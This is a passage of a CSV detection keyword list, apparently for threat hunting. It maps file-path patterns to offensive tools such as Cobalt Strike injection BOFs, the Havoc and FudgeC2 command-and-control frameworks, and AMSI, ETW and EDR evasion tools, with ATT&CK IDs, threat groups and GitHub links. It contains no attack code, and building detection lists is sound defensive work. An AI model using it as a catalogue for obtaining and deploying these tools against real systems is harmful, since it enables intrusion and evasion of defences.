- T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/implant/register_cmd*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/implants/*/Syscalls.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - 
T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/impress-remote-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/inceptor.git*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/inceptor.git*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/infection_monkey/*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation 
tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/Infoga*","offensive_tool_keyword","Infoga","Email Information Gathering.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/m4ll0k/Infoga","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*/informix-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/informix-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/informix-tables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/inject.cpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/Inject/Dll/LoadDll*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" 
+"*/Inject/PE/*.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/Inject/ShellCode/*.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/injectAmsiBypass/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*/inject-assembly/*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*/injectEtw.*","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","253","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" +"*/Injection/clipboard/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/conhost/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/createremotethread/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ctray/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/dde/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 
- T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/Injection.cna*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/kernelcallbacktable*","offensive_tool_keyword","cobaltstrike","Cobaltstrike 
injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ntcreatethread*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ntcreatethread/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ntqueueapcthread*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/setthreadcontext*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" 
+"*/Injection/svcctrl/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/tooltip/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
